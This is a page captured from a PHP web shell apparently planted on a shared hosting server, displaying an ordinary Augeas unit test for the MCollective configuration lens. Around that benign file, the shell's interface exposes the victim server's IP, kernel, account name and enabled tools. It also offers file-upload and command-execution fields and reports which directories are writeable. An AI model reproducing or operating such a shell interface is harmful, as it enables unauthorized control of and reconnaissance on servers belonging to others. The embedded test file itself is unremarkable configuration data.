403Webshell
Server IP : 104.21.14.103  /  Your IP : 3.144.232.71
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/puppetlabs/puppet/share/augeas/lenses/dist/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/puppetlabs/puppet/share/augeas/lenses/dist/tests/test_mcollective.aug
(*
Module: Test_MCollective
  Provides unit tests and examples for the <MCollective> lens.
*)

module Test_MCollective =

let conf = "topicprefix = /topic/
main_collective = mcollective
collectives = mcollective
libdir = /usr/libexec/mcollective
logger_type = console
loglevel = warn

# Plugins
securityprovider = psk
plugin.psk = unset

connector = stomp
plugin.stomp.host = localhost
plugin.stomp.port = 61613
plugin.stomp.user = mcollective
plugin.stomp.password = secret

# Facts
factsource = yaml # bla
plugin.yaml=/etc/mcollective/facts.yaml
"

test MCollective.lns get conf =
  { "topicprefix" = "/topic/" }
  { "main_collective" = "mcollective" }
  { "collectives" = "mcollective" }
  { "libdir" = "/usr/libexec/mcollective" }
  { "logger_type" = "console" }
  { "loglevel" = "warn" }
  { }
  { "#comment" = "Plugins" }
  { "securityprovider" = "psk" }
  { "plugin.psk" = "unset" }
  { }
  { "connector" = "stomp" }
  { "plugin.stomp.host" = "localhost" }
  { "plugin.stomp.port" = "61613" }
  { "plugin.stomp.user" = "mcollective" }
  { "plugin.stomp.password" = "secret" }
  { }
  { "#comment" = "Facts" }
  { "factsource" = "yaml"
    { "#comment" = "bla" }
  }
  { "plugin.yaml" = "/etc/mcollective/facts.yaml" }


Youez - 2016 - github.com/yon3zu
LinuXploit